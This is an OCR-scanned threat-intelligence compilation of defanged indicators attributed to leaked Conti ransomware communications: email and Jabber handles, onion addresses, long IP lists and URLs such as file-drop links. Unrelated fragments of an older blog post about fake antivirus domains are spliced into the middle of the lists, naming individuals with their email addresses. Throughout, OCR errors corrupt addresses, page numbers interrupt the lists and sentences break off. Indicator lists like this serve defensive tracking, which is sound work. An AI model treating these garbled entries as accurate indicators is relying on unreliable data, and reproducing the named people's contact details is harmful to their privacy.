tbswitch34[.]protonmail.com 
tdubfin[.]protonmail.com 
tdukeg87[.]protonmail.com 
te4all[.Jro.ru 
tenonises1980[.]protonmail.com 
terry[.]q3mcco35auwcstmt.onion 
test[.]q3mcco35auwcstmt.onion 
thalegarrison77[.]protonmail.com 
tiktak[.]q3mcco35auwcstmt.onion 
tilar[.]q3mcco35auwcstmt.onion 
timman[.]tutanota.com 
tlloyid.hyman[.]protonmail.com 
tnodex08[. ]tutanota.com 


tnt[.]Jq3mcco35auwcstmt.onion 


19945 


tolores[.]Jrambler.ua 
tom[.]Jq3mcco35auwcstmt.onion 
toris[.]q3mcco35auwcstmt.onion 
torres-claudia[.]email.com 
total[.]Jqg3mcco35auwcstmt.onion 
tparkernode[.]protonmail.com 
tpilligrimm[.]protonmail.com 
tqx.rock[.]protonmail.com 
tramolta[.]lenta.ru 

trev[.]f.com 
troy[.]qg3mcco35auwcstmt.onion 
trumen[.]Jq3mcco35auwcstmt.onion 
trump[.]Jq3mcco35auwcstmt.onion 
trutu[.]tuta.io 
ts.gulfeg[.]protonmail.com 
tsbarber20[.]protonmail.com 
tsnoop3000[.]protonmail.com 
tstive772q[.]protonmail.com 
tunnep[.]protonmail.com 
tunotif[.]Jq3mcco35auwcstmt.onion 
tunri[.Jqg3mcco35auwcstmt.onion 
turnsa[.]rambler.ua 
twin[.]Jq3mcco35auwcstmt.onion 
twister[.]qg3mcco35auwcstmt.onion 
ubeoul[.]ro.ru 
ululnefarc1985[.]protonmail.com 
unimore[.]keemail.me 
unmoved-surfboard[.]erne2zza6ml7raoae5sii5dasshhizoe4igsswrynrkpdj2r4r5uf vqd.onion 
unodetune[. ]tutanota.com 
upuna[.]rambler.ua 
urban[.]Jq3mcco35auwcstmt.onion 
urbanone[.]q3mcco35auwcstmt.onion 
user[.]gmail.com 

utuit[.]ro.ru 


vicev1[.]Jqg3mcco35auwcstmt.onion 
19946 


valerius2k[.]jabber.ru 
vampire[.]q3mcco35auwcstmt.onion 
van[.]qg3mcco35auwcstmt.onion 
vang[.]Jqg3mcco35auwcstmt.onion 
vasyamilov[.]thesecure.biz 
vertu[.]q3mcco35auwcstmt.onion 
vho2017[.]ya.ru 
viabio[.]rambler.ua 
victor[.]Jq3mcco35auwcstmt.onion 
viper[.]Jq3mcco35auwcstmt.onion 
vkaryagin[.]jabber.ru 
volhvb[.]exploit.im 
voron[.]qg3mcco35auwcstmt.onion 
vouvon].]ro.ru 
vselenamut[.]protonmail.com 
wandone[. ]protonmail.com 
wanwone|[.]rambler.ua 
warabail[.]tutamail.com 
waroru[.]ro.ru 
watota[.]tutanota.com 
watson[.]q3mcco35auwcstmt.onion 
weav[.]Jqg3mcco35auwcstmt.onion 


wellproxadsit1980[.]protonmail.com 


werka[.]conference.q3mcco35auwcstmt.onion 


wertuone[.]rambler.ua 
winston[.]q3mcco35auwcstmt.onion 
wma[.]rambler.ua 
woldisaev[.]jabber.ru 

wonto[. ]tuta.io 
workman1[.]qg3mcco35auwcstmt.onion 
workman2[.]q3mcco35auwcstmt.onion 
wsawsa[. Jrambler.ua 
xargs[.]Jqg3mcco35auwcstmt.onion 
xenon[.]q3mcco35auwcstmt.onion 


xmoneyl.Jq3mcco35auwcstmt.onion 


19947 


xnull[.]Jq3mcco35auwcstmt.onion 
xoc[.]Jq3mcco35auwcstmt.onion 
xxx[.]q3mcco35auwcstmt.onion 
yastreb[.]exploit.im 
zantorino[.]keemail.me 
zazzn[.]ro.ru 
zevs[.]Jq3mcco35auwcstmt.onion 
zholbolat.temirlan[.]gmail.com 
zloysobaka[.]q3mcco35auwcstmt.onion 
zulas[.]q3mcco35auwcstmt.onion 
UPDATE: 


The following is a list of all the IPs found in the leaked internal communicatioin of the Conti 
ransomware gang. 


112[.]196[.]167[.]42 
112[.]196[.]167[.]58 
117[.]196[.]229[.]213 
117[.]196[.]233[.]231 
117[.]196[.]234[.]254 
117[.]212[.]192[.]178 
117[.]212[.]194[.]48 
117[.]212[.]195[.]197 
117[.]212[.]195[.]24 
117[.]212[.]94[.J124 
117[.]222[.]62[.]141 
117[.]222[.]62[.J251 
117[.]241[.]99[.]24 
117[.]242[.]37[.]213 
117[.]252[.]64[.J225 
117[.]252[.]65[.]13 
117[.]252[.]65[.]27 
117[.]252[.]66[.]77 
117[.]252[.]68[.J226 
117[.]254[.]56[.]72 
117[.]254[.]62[.]253 
118[.]69[.J221[.]114 
11[.]22[.]33[.]44 
19948 


124[.]158[.]172[.]28 
125[.]125[.]125[.]125 
125[.]163[.]175[.]91 
125[.]164[.]152[.]29 
125[.]164[.]24[.]116 
125[.]165[.]227[.]51 
125[.]167[.]144[.134 
12[.]215[.]19[.]98 
12[.]31[.]238[.]42 
12[.191[.]243[.]78 
131[.]153[.]22[.]145 
131[.]153[.]22[.]148 
131[.]255[.]169[.]48 
134[.]119[.]191[.]11 
134[.]119[.]191[.J21 
134[.]119[.]191[.]22 
134[.]119[.]191[.138 
134[.]119[.]191[.]43 
134[.]19[.]189[.]187 
134[.]19[.]189[.]196 
134[.]255[.]235[.188 
134[.]255[.]254[.]194 
136[.]243[.]42[.]38 
137[.]26[.]64[.]78 
138[.]36[.]199[.]158 
138[.]91[.]73[.]189 
138[.]97[.]93[.]125 
13[.]58[.]213[.]252 
143[.]255[.]7[.]233 
144[.]91[.]79[.16 
146[.]112[.]43[.]85 
148[.]251[.]27[.]244 
148[.]251[.]99[.]95 
148[.]72[.]149[.]119 
149[.]28[.]43[.]215 


19949 


156[.]96[.]113[.]99 
156[.]96[.]118[.]48 
156[.]96[.J156[.J221 
156[.]96[.]156[.]31 
156[.]96[.]46[.]27 
156[.]96[.]59[.]26 
156[.]96[.]59[.]27 
157[.]185[.]84[.]186 
158[.]69[.]133[.]74 
158[.]69[.]133[.]78 
162[.]223[.]91[.J111 
162[.]223[.]91[.]5 
162[.]244[.]32[.]145 
162[.]244[.]81[.]159 
162[.]244[.]81[.]57 
162[.]244[.]81[.]87 
162[.]244[.]82[.]246 
164[.]132[.]255[.]233 
164[.]132[.]76[.J175 
164[.]132[.]76[.]76 
164[.]68[.]116[.]248 
167[.]86[.]123[.J175 
167[.]86[.J126[.]27 
167[.]86[.J127[.J125 
172[.]18[.]9[.J22 
172[.]58[.]7[.133 
172[.]83[.]43[.]136 
172[.]98[.]93[.]227 
173[.]231[.]59[.J124 
173[.]231[.]63[.]82 
173[.]231[.]63[.]98 
173[.]232[.]146[.]11 
173[.]232[.]146[.]118 
173[.]232[.]146[.]12 
173[.]232[.]146[.]199 
19950 


173[.]232[.]146[.]224 
173[.]232[.]146[.]226 
173[.]232[.]146[.]236 
173[.]232[.]146[.]29 
173[.]232[.]146[.]63 
173[.]232[.]146[.]72 
173[.]232[.]146[.]91 
173[.]232[.]146[.]93 
173[.]234[.]155[.]124 
173[.]66[.]249[.]216 
173[.]79[.]159[.]16 
174[.]194[.]136[.]122 
174[.]198[.]16[.]113 
174[.]242[.]147[.]172 
174[.]244[.]192[.]244 
176[.]119[.]159[.]213 
177[.]134[.1244[.]53 
177[.]19[.]41[.]192 
177[.]46[.]194[.]154 
177[.]46[.]197[.]82 
177[.]76[.J218[.]32 
177[.]76[.J222[.]137 
177[.]92[.]89[.]225 
177[.]96[.]87[.]31 
177[.]99[.J21[.]247 
179[.]127[.]85[.]8 
179[.]211[.]238[.]56 
179[.]43[.]147[.]234 
179[.]43[.]147[.]243 
179[.]43[.]158[.]187 
181[.]112[.]157[.]42 
181[.]129[.]134[.]18 
182[.]253[.]113[.]67 
182[.]253[.]123[.]52 
182[.]253[.]174[.]193 


19951 


182[.]253[.]88[.]153 
184[.]164[.]137[.]172 
184[.]164[.]137[.]173 
184[.]164[.]146[.]112 
184[.]164[.]146[.]113 
185[.]117[.]73[.]164 
185[.]117[.]73[.]54 
185[.]141[.]63[.]159 
185[.]141[.]63[.]38 
185[.]142[.]99[.]25 
185[.]142[.]99[.]32 
185[.]142[.]99[.]8 
185[.]14[.]31[.]135 
185[.]14[.]31[.]137 
185[.]14[.]31[.]143 
185[.]14[.]31[.]164 
185[.]14[.]31[.]44 
185[.]156[.]173[.]99 
185[.]158[.]248[.]251 
185[.]163[.]47[.]157 
185[.]163[.]47[.]215 
185[.]164[.]32[.]118 
185[.]164[.]32[.]135 
185[.]164[.]32[.]148 
185[.]164[.]32[.]161 
185[.]164[.]32[.]214 
185[.]164[.]32[.J215 
185[.]164[.]32[.]216 
185[.]164[.]32[.]218 
185[.]164[.]32[.]219 
185[.]172[.]129[.]178 
185[.]172[.]129[.]62 
185[.]17[.]121[.]162 
185[.]17[.]123[.]63 
185[.]181[.]229[.]146 
19952 
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What is the difference between a reactive and proactive threat intell? A reactive threat intell is 
assessing a Campaign, individual, a group of individuals, how are they related to one another, 
and what have they been doing in the past, based exclusively on a lead that’s been found 
within the past couple of hours. 


Try the very latest rogue security domains courtesy of three domainers (Fedor Ibrag- 
imov cndomainz@yahoo.com, Anton Golovayk gpdomains@yahoo.com and Ivan Durov 
idomains.admin@gmail.com ) whose portfolios can always keep you updated about the latest 
releases of such popular software as The Best Antivirus Cleaner 2008. 


powerfullantivirusscan .com (78.159.118.217; 89.149.253.215; 208.72.168.185) 
protection-update .com 

updatepcprotection .com 

updateyourprotection .com 

mac-imunizator .net (67.205.75.10) 

avproinstall .com (78.157.141.26) 

winavpro .com (92.241.163.30) 


1998 


185[.]183[.]96[.]11 
185[.]183[.]96[.]51 
185[.]183[.]98[.]14 
185[.]183[.]99[.]149 
185[.]189[.]149[.]148 
185[.]189[.]151[.]142 
185[.]198[.]57[.]75 
185[.]198[.]57[.]88 
185[.]212[.]47[.]173 
185[.]217[.]117[.]127 
185[.]234[.]72[.]114 
185[.]234[.]72[.]147 
185[.]234[.]72[.]155 
185[.]234[.]72[.]35 
185[.]234[.]72[.]77 
185[.]234[.]72[.]93 
185[.]234[.]72[.]94 
185[.]242[.]85[.]194 
185[.]244[.]149[.]47 
185[.]244[.]149[.]48 
185[.]244[.]151[.]133 
185[.]244[.]213[.134 
185[.]244[.]39[.J251 
185[.]244[.]39[.]65 
185[.]25[.]48[.]166 
185[.]25[.]48[.]19 
185[.]25[.]48[.]244 
185[.]25[.]48[.185 
185[.]25[.]51[.]139 
185[.]25[.]51[.]2 
185[.]25[.]51[.]99 
185[.]43[.]5[.]79 
185[.]43[.]6[.]59 
185[.]66[.]12[.]218 
185[.]66[.]13[.]126 


19953 


185[.]68[.]93[.]33 
185[.]68[.193[.]72 
185[.]68[.]93[.18 
185[.]82[.]126[.]126 
185[.]82[.]126[.]142 
185[.]82[.]126[.]178 
185[.]82[.]126[.]49 
185[.]82[.]127[.]4 
185[.]86[.]148[.]63 
185[.]99[.]2[.]115 
185[.]99[.]2[.]116 
185[.]99[.]2[.]118 
185[.]99[.]2[.]123 
185[.]99[.]2[.]128 
185[.]99[.]2[.]161 
185[.]99[.]2[.]176 
185[.]99[.]2[.]179 
185[.]99[.]2[.]184 
185[.]99[.]2[.]191 
185[.]99[.]2[.]196 
185[.]99[.]2[.]221 
185[.]99[.]2[.]238 
185[.]99[.]2[.]239 
185[.]99[.]2[.]243 
185[.]99[.]2[.]244 
185[.]99[.]2[.]49 
185[.]99[.]2[.]54 
185[.]99[.]2[.]65 
185[.]99[.]2[.]66 
185[.]99[.]2[.]83 
186[.]192[.]178[.]57 
186[.]216[.]125[.]178 
187[.]35[.]237[.]51 
187[.]65[.]49[.]148 
187[.]65[.]49[.]157 
19954 


187[.]85[.]6[.]15 
188[.]116[.]23[.]111 
188[.]116[.]27[.]84 
188[.]213[.]139[.]117 
188[.]225[.]33[.]51 
188[.]225[.]9[.]82 
188[.]227[.]59[.]174 
188[.]227[.]59[.]21 
188[.]68[.J221[.]214 
189[.]126[.]76[.]249 
189[.]126[.]77[.]143 
189[.]126[.]77[.]158 
189[.]126[.]78[.]19 
18[.]191[.]38[.]26 
18[.]212[.]74[.]215 
18[.]236[.]63[.]179 
191[.]254[.]117[.]196 
191[.]37[.J212[.]123 
191[.]37[.]213[.]118 
191[.]37[.]213[.]79 
192[.]169[.]6[.]82 
192[.]214[.]98[.]81 
192[.]3[.J247[.]11 
192[.]3[.]247[.]112 
192[.]3[.]247[.]115 
192[.]3[.]247[.]116 
192[.]3[.]247[.]123 
192[.]99[.J211[.]47 
192[.]99[.J255[.]32 
193[.]148[.]18[.]35 
193[.]148[.]18[.]68 
193[.]148[.]18[.]86 
193[.]238[.]153[.]7 
194[.]156[.]98[.]172 
194[.]156[.]98[.J215 


19955 


194[.1156[.198[.]38 
194[.]156[.]98[.]46 
194[.]31[.]141[.]134 
194[.]36[.]188[.]92 
194[.]36[.]191[.]13 
194[.]36[.]191[.]164 
194[.]5[.J249[.]113 
194[.]5[.]249[.]126 
194[.]5[.]249[.]128 
194[.]5[.J249[.]13 
194[.]5[.]249[.]136 
194[.]5[.]249[.]14 
194[.]5[.J249[.]142 
194[.]5[.J249[.]143 
194[.]5[.]249[.]156 
194[.]5[.J249[.]163 
194[.]5[.]249[.]164 
194[.]5[.]249[.]168 
194[.]5[.J249[.]17 
194[.]5[.J249[.]171 
194[.]5[.]249[.]174 
194[.]5[.J249[.]175 
194[.]5[.J249[.]185 
194[.]5[.]249[.]186 
194[.]5[.J249[.]193 
194[.]5[.]249[.]194 
194[.]5[.J249[.]195 
194[.]5[.]249[.]196 
194[.]5[.J249[.]197 
194[.]5[.]249[.]198 
194[.]5[.]249[.]214 
194[.]5[.J249[.]215 
194[.]5[.]249[.]216 
194[.]5[.J249[.]217 
194[.]5[.J249[.]221 
19956 


194[.]5[.]249[.]225 
194[.]5[.]249[.]226 
194[.]5[.J249[.]229 
194[.]5[.]249[.]241 
194[.]5[.]249[.]242 
194[.]5[.]249[.]246 
194[.]5[.]249[.]247 
194[.]5[.]249[.]248 
194[.]5[.]249[.]31 
194[.]5[.]249[.]39 
194[.]5[.]249[.]46 
194[.]76[.J224[.]61 
194[.]76[.]226[.]98 
194[.]87[.]145[.]86 
194[.]87[.]232[.]53 
195[.]123[.]212[.]211 
195[.]123[.]213[.]19 
195[.]123[.]217[.]27 
195[.]123[.]221[.]49 
195[.]123[.]222[.]2 
195[.]123[.]222[.]49 
195[.]123[.]237[.]153 
195[.]123[.]237[.]241 
195[.]123[.]237[.]91 
195[.]123[.]237[.]95 
195[.]123[.]238[.]28 
195[.]123[.]241[.]12 
195[.]123[.]241[.]124 
195[.]123[.]241[.]13 
195[.]123[.]241[.]134 
195[.]123[.]241[.]136 
195[.]123[.]241[.]145 
195[.]123[.]241[.]146 
195[.]123[.]241[.]147 
195[.]123[.]241[.]149 


19957 


195[.]123[.]241[.]157 
195[.]123[.]241[.]175 
195[.]123[.]241[.]182 
195[.]123[.]241[.]183 
195[.]123[.]241[.]187 
195[.]123[.]241[.]194 
195[.]123[.]241[.]224 
195[.]123[.]241[.]229 
195[.]123[.]241[.]241 
195[.]123[.]241[.]242 
195[.]123[.]241[.]243 
195[.]123[.]241[.]44 
195[.]123[.]241[.]49 
195[.]123[.]241[.]51 
195[.]123[.]241[.]52 
195[.]123[.]241[.]55 
195[.]123[.]241[.]58 
195[.]123[.]241[.]59 
195[.]123[.]241[.]63 
195[.]123[.]241[.]68 
195[.]123[.]241[.]85 
195[.]123[.]241[.]92 
195[.]123[.]241[.]94 
195[.]123[.]242[.]119 
195[.]123[.]242[.]132 
195[.]123[.]242[.]135 
195[.]123[.]242[.]141 
195[.]123[.]242[.]36 
195[.]123[.]242[.]37 
195[.]123[.]242[.]57 
195[.]123[.]242[.]71 
195[.]123[.]242[.]72 
195[.]123[.]242[.]83 
195[.]123[.]242[.]84 
195[.]123[.]242[.]99 
19958 


195[.]123[.]243[.]19 
195[.]123[.]247[.134 
195[.]2[.]93[.]227 
195[.]91[.J226[.]161 
198[.]233[.]175[.]66 
198[.]46[.]198[.]111 
198[.]46[.]198[.]128 
198[.]46[.]198[.]129 
198[.]46[.]198[.]13 
198[.]46[.]198[.]131 
198[.]46[.]198[.]133 
198[.]46[.]198[.]139 
199[.]116[.]81[.]194 
199[.]217[.]119[.]222 
1[.J1[.J1[.]1 
212[.]129[.]41[.]246 
213[.]252[.]247[.]162 
213[.]87[.]146[.]113 
216[.]144[.]236[.]212 
216[.]194[.]176[.]129 
216[.]244[.]83[.]226 
216[.]244[.]85[.]15 
216[.]59[.]112[.]226 
217[.]12[.]218[.]196 
217[.]12[.]218[.]199 
217[.]12[.]218[.]28 
217[.]12[.]218[.]29 
217[.]12[.]219[.]118 
217[.J12[.]219[.]245 
217[.J172[.]179[.]14 
217[.]23[.]1[.]184 
23[.]148[.]144[.]242 
23[.]239[.]84[.]132 
23[.]239[.]84[.]136 
23[.]92[.]93[.]227 


19959 


23[.]92[.]93[.]232 
23[.]92[.]93[.]234 
23[.]92[.]93[.]236 
23[.]92[.]93[.]237 
23[.]94[.]233[.]253 
23[.]95[.]97[.]59 
24[.]196[.]61[.]74 
34[.]222[.]222[.]126 
34[.]238[.]84[.]181 
34[.]239[.]246[.]132 
35[.]191[.]255[.]255 
36[.]66[.]218[.]117 
36[.]68[.]95[.]228 
36[.]69[.]136[.]238 
36[.]72[.]89[.]95 
36[.]73[.]152[.]146 
36[.]73[.]152[.]96 
36[.]79[.]218[.]135 
36[.]89[.]182[.]225 
36[.]89[.]243[.]241 
37[.J1[.J221[.]52 
37[.J1[.J223[.]182 
37[.]228[.]117[.187 
37[.]252[.]11[.]147 
37[.]252[.]13[.J245 
37[.]252[.]4[.]97 
37[.]252[.]5[.]139 
37[.]252[.]5[.]156 
37[.]252[.]5[.]157 
37[.]252[.]5[.]58 
37[.]252[.]8[.]144 
37[.]252[.]8[.]161 
37[.]252[.]8[.]182 
37[.]252[.]8[.]186 
37[.]252[.]8[.]187 
19960 


37[.]252[.]8[.]193 
37[.]252[.]9[.]154 
37[.]252[.]9[.J224 
37[.]252[.]9[.]69 
37[.]72[.]168[.]242 
38[.J122[.]185[.]171 
38[.]132[.]113[.]62 
38[.]132[.]96[.]56 
38[.]132[.]96[.]61 
3[.]128[.]197[.]68 
3[.]128[.]1[.]1 
3[.]128[.]1[.]29 
3[.]128[.]222[.J222 
3[.]12[.]41[.]157 
3[.]135[.]193[.]147 
3[.]135[.]216[.]86 
3[.]137[.]174[.]178 
3[.]138[.]117[.]231 
3[.]139[.]97[.16 
3[.]21[.]2[.]2 
3[.]235[.]164[.J215 
3[.]238[.]75[.]236 
3[.]238[.]77[.]5 
3[.]81[.]126[.]82 
3[.]82[.]197[.]66 
3[.]84[.]251[.]164 
3[.]86[.]163[.]159 
3[.]88[.]67[.]132 
3[.]91[.]47[.]199 
3[.]95[.]231[.]52 
42[.]246[.]46[.]32 
45[.]11[.]183[.]152 
45[.]11[.]183[.]18 
45[.]11[.]183[.]78 
45[.]138[.]158[.]35 


19961 


45[.]138[.]158[.]41 
45[.]138[.]158[.]53 
45[.]152[.]182[.]131 
45[.]152[.]182[.]147 
45[.]153[.]185[.]81 
45[.]155[.]173[.]196 
45[.]175[.]125[.]157 
45[.]179[.]112[.]52 
45[.]179[.]112[.]89 
45[.]186[.]96[.]249 
45[.]231[.]243[.]254 
45[.]235[.]149[.]112 
45[.]235[.]151[.]37 
45[.]235[.]6[.]161 
45[.]251[.]43[.]152 
45[.]67[.]228[.]196 
45[.]67[.]231[.]167 
45[.]6[.]16[.]68 
45[.]78[.]132[.]242 
45[.]87[.]214[.]198 
45[.]87[.]214[.]214 
45[.]89[.]125[.]148 
45[.]89[.]127[.]118 
45[.]89[.]127[.]119 
45[.]89[.]127[.]178 
45[.]89[.]127[.]182 
45[.]89[.]127[.]214 
45[.]89[.]127[.]222 
45[.]89[.]127[.]224 
45[.]89[.]127[.]27 
45[.]89[.]127[.]38 
45[.]89[.]127[.]91 
45[.]89[.]127[.]92 
45[.]89[.]175[.]135 
46[.]17[.]98[.]193 
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As far as proactive threat intell is concerned, try the following "upcoming fake security software 
domains" : 


spywaredefender2009 .com 
spywaredestroyer2009 .com 
spywareeliminator2009 .com 
spywareprotector2009 .com 


It would be interesting to monitor whether or not the well known non-existent security 
software brands we’ve monitoring throughout 2008, will be basically typosquatted in a 2009 
like fashion, or would they simply introduce new brands. With their business model under 
pressure, I’m starting to see evidence of schemes involving the illegal advertisement of 
affiliate links to legitimate security software, where the cybercriminals are actual resellers 
of it. There’s also no shortage of surreal situations, where a fake security software is taking 


1999 


46[.]249[.]32[.]111 
46[.]249[.]32[.]139 
46[.]249[.]32[.]16 
46[.]249[.]62[.]195 
46[.]249[.]62[.]234 
46[.]28[.]69[.]11 
46[.]28[.]69[.]153 
46[.]28[.]69[.]53 
46[.]28[.]69[.]81 
46[.]4[.]167[.J227 


51[.]195[.]192[.]115 


51[.]38[.]118[.]153 
51[.]75[.]181[.]36 
51[.]77[.J112[.]252 
51[.]77[.]112[.]253 
51[.]77[.]112[.]254 
51[.]77[.]112[.]255 
51[.]81[.]112[.]137 
51[.]81[.]112[.]144 
51[.]81[.]112[.J171 
51[.]89[.]125[.J117 
51[.]89[.J125[.J122 
51[.]89[.]125[.]28 
51[.]89[.]163[.]32 
51[.]89[.]163[.]33 
51[.]89[.]177[.]1 
51[.]89[.]177[.J11 
51[.]89[.]177[.J15 
51[.]89[.]177[.]16 
51[.]89[.]177[.]18 
51[.]89[.]177[.]3 
51[.]89[.]177[.]31 
51[.]89[.]177[.]4 
51[.]89[.]177[.]5 
51[.]89[.]177[.]7 
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51[.]89[.]177[.]8 
51[.]89[.]177[.]9 
51[.]89[.]215[.]186 
51[.]89[.]215[.]189 
51[.]89[.]241[.]81 
52[.]13[.]154[.]32 
52[.]237[.]163[.]166 
52[.]34[.]17[.]37 
52[.]37[.]88[.]45 
54[.]185[.]138[.]96 
54[.]196[.]129[.]197 
54[.]198[.]212[.]211 
54[.]212[.]116[.]99 
54[.]212[.]16[.]8 
54[.]213[.]49[.]29 
54[.]236[.]253[.]121 
54[.]245[.]74[.J151 
54[.]37[.]237[.]253 
54[.]83[.]253[.]135 
54[.]91[.]36[.]142 
5[.]17[.]161[.]235 
5[.]181[.J156[.J211 
5[.]181[.]156[.J226 
5[.]181[.]156[.]238 
5[.]182[.]211[.J124 
5[.]182[.J211[.J125 
5[.]182[.]211[.]138 
5[.]182[.]211[.]218 
5[.]182[.J211[.]222 
5[.]182[.]211[.]223 
5[.]182[.]211[.]25 
5[.]182[.]211[.]47 
5[.]188[.]133[.]193 
5[.]1[.]81[.]68 
5[.]34[.]178[.]247 
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5[.]34[.]178[.]59 
5[.]34[.]181[.]32 
5[.]61[.]32[.]173 
5[.]61[.]33[.]195 
5[.]61[.]34[.]245 
5[.]61[.]34[.163 
5[.]61[.]36[.]89 
5[.]61[.]45[.]151 
5[.]61[.]61[.]169 
5[.]9[.]178[.175 
62[.]113[.]114[.]91 
62[.]113[.]119[.]119 
62[.]75[.]216[.]38 
63[.]141[.]224[.]42 
63[.]157[.]5[.]162 
64[.]173[.]224[.]7 
64[.J227[.]113[.]155 
64[.]44[.]133[.J137 
64[.]44[.]133[.]61 
64[.]56[.]74[.]56 
65[.]186[.]2[.]65 
66[.]115[.]149[.]227 
66[.]189[.]183[.]14 
66[.J222[.]113[.]245 
66[.]42[.]113[.]88 
66[.]85[.]156[.]68 
66[.]85[.]156[.]69 
66[.]85[.]183[.]5 
67[.]197[.]55[.]33 
67[.]221[.]143[.]83 
68[.J224[.]217[.]72 
68[.]74[.]132[.]63 
69[.]145[.]82[.]234 
69[.]197[.]132[.]42 
69[.]243[.]37[.]254 
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69[.]244[.]229[.]112 
69[.]3[.J129[.]242 
71[.]173[.]79[.]26 
71[.]174[.1248[.]248 
71[.]49[.]134[.]187 
72[.]12[.]194[.]92 
73[.]132[.]17[.]148 
73[.]63[.]223[.]199 
73[.]84[.J127[.]221 
74[.J222[.]14[.]27 
78[.]46[.]78[.]74 
79[.]141[.]167[.]25 
79[.]143[.]31[.]167 
81[.]177[.]139[.138 
81[.]177[.]141[.]219 
82[.]118[.]16[.J219 
82[.]146[.]36[.]156 
82[.]146[.]37[.]128 
82[.]146[.]54[.]254 
82[.]148[.]16[.]92 
84[.]17[.]52[.]77 
84[.]17[.]61[.]67 
84[.]17[.]63[.]12 
84[.]247[.]51[.J126 
85[.]143[.]221[.]6 
85[.]143[.]221[.]85 
85[.]143[.]223[.]16 
88[.]119[.]174[.J211 
88[.]119[.]174[.]219 
88[.]119[.]174[.]228 
88[.]119[.]175[.]123 
88[.]119[.]175[.]222 
88[.]119[.]175[.]234 
88[.]119[.]175[.]58 
88[.]119[.]175[.176 
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88[.]119[.]175[.]97 
89[.]187[.]171[.]243 
89[.]187[.]175[.]137 
89[.]191[.]234[.]53 
89[.]238[.]224[.]226 
89[.]249[.]65[.J229 
89[.]32[.]41[.]152 
89[.]32[.]41[.]184 
89[.]32[.]41[.]191 
89[.]38[.]225[.]171 
89[.]38[.]225[.]228 
89[.]44[.]9[.]148 
8[.]17[.J112[.]7 
8[.]8[.]8[.]8 
91[.]132[.]139[.]153 
91[.]132[.]139[.]218 
91[.J235[.]129[.]151 
91[.J235[.]129[.]241 
91[.J235[.]129[.]41 
91[.]235[.]129[.164 
93[.]189[.]41[.]213 
93[.]189[.]42[.]83 
93[.]189[.]46[.]41 
95[.]153[.]31[.]13 
95[.]153[.]31[.]163 
95[.]153[.]31[.]169 
95[.J171[.]15[.]71 
95[.]171[.]16[.]42 
95[.]181[.]155[.]77 
95[.]211[.]38[.]161 
95[.]211[.]95[.]232 
95[.]217[.]4[.185 
95[.]26[.]211[.]228 
96[.]36[.]51[.]115 
96[.]77[.]226[.]65 
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96[.]79[.]67[.]178 
96[.]95[.]54[.]21 
96[.]9[.]225[.]146 
96[.]9[.]225[.]147 
96[.]9[.]252[.]152 
96[.]9[.J255[.]223 
98[.]152[.]199[.]222 
98[.]195[.]11[.]49 
98[.]221[.]5[.]74 
UPDATE: 


The following is a complete list of all the URLs found in the internal leaked communicatioin of 
the Conti ransomware gang obtained using public sources. 


hxxp://privnote[.]com/vLjjYbgQ 


hxxp://www[.]zdnet[.]com/article/first-ever-malware-strain-spotted-ab using-new-doh-dns- 
over-https-protocol/ 


hxxp://qaz[.]im/load/GYrY7d/QFHftF 
hxxp://63[.]141[.]224[.]42 
hxxp://www[.]sendspace[.]com/file/5e50z2 
hxxp://www[.]sendspace[.]com/file/5dinll 
hxxp://send[.]firefox[.]com/download/1745dbcf5f85fbc1/ 
hxxp://send[.]firefox[.]com/download/80060c7f5a737d9b/ 
hxxp://logdog[.]pw/?zPX6vO 

hxxp://logdog[.]pw/?cOB _7d 
hxxp://qaz[.]lim/load/AEz5zd/zaN5h4 
hxxp://qaz[.]im/index[.]php?a=delete &q=1282691591 
hxxp://logdog[.]pw/?qSb4eWh6i5jMDt7fGMF6 
hxxp://prnt[.]sc/t49eu7 
hxxp://63[.]141[.]224[.]42/vs/data/mass 1 dataf[.]txt 
hxxp://logdog[.]pw/?G1LiZoFjrVYSVIjWL490ON 
hxxp://mk6gwg6mwnnGif33[.]onion/ 
hxxp://send[.]firefox[.]com/download/6f8aaf93b777d90f/ 
hxxp://www[.]truesocks[.]net 

hxxp://prnt[.]sc/t4bv4y 
hxxp://qaz[.]im/load/bft3sN/A7nhfk 
hxxp://qaz[.]im/index[.]php?a=delete &q=2064137483 
hxxp://eba[.]eset[.]Jcom 
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hxxp://cloud[. ]gravityzone[. ]bitdefender[.]Jcom 
hxxp://centrall[.]bitdefender[.]com/download?install code=73909d66-2a8c-46e0-a542-74 
hxxp://cloud[.]sophos[.]Jcom 

hxxp://dzr-api-amzn-us-west-2-fa88[.]api-upel[.]p[.]hmr[.]Jsophos [.]com/api/download/37bdfc 
hxxp://identity[. ]}webrootanywhere[.]com/v1/Account/login 
hxxp://wwwI[.]trendmicro[.]com/product _trials/service/index/us/157 

hxxp://tm[. Jlogin[.]trendmicro[.]com/ 


hxxp://b2b-download[.]mcafee[.]com/products/evaluation/Endpoint _Secu- 
rity/Evaluation/10[.]7[.]0/McAfee Endpoint Security 10 7 0 667 _17 _bundle[.]zip 


hxxp://wwwI.lavast[.]com/en-us/download-thank-you[.]php?product=BMS 
hxxp://privnote[.]Jcom/vyzWjq7M 
hxxp://qaz[.]im/load/2dTbHD/G76KB7 
hxxp://qaz[.]im/index[.]php?a=delete &q=2040935925 
hxxp://23[.]95[.]231[.]200/images/imgpaper[.]png 
hxxp://23[.]95[.]231[.]200/images/cursor[.]png 
hxxp://23[.]95[.]231[.]200/images/redcar[.]png 
hxxp://secure[.]doublevpn[.]com/ 
hxxp://vpnlab[. ]net/ 
hxxp://anonymous-vpn[. ]biz/ 
hxxp://vidvpn[.]cc/Ik/success 
hxxp://qaz[.]Jim/load/5fKYRE/rAG5S7 
hxxp://qaz[.]im/index[.]php?a=delete &q=1128688759 
hxxp://qaz[.]Jim/load/s58h5f/GbnrdN 
hxxp://qaz[.]im/index[.]php?a=delete &q=1458784177 
hxxp://mk6gwg6mwnnGif33[.]onion/issues/108/edit 
hxxp://mk6gwg6mwnnGif33[.]onion/issues/209 
hxxp://dropmefiles[.]Jcom/5b2mu naponb 
hxxp://173[.]232[.]146[.]199/phpvirtualbox-5[.]0-5/ 
hxxp://173[.]232[.]146[.]72 
hxxp://qaz[.]im/load/QaYt9F/frdHd4 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2108824035 
hxxp://logdog[.]pw/?dGpybo 
hxxp://185[.]202[.]174[.]7 
hxxp://dyncheck[.]com/scan/id/74a96dc865db0336d6cc8f8394b8725c 
hxxp://qaz[.]im/load/G5ekTi/9Hsrak 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1768552088 
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hxxp://privnote[.]com/M6ypn0XM 
hxxp://qaz[.]im/load/BhZQ2i/8Y6NfG 
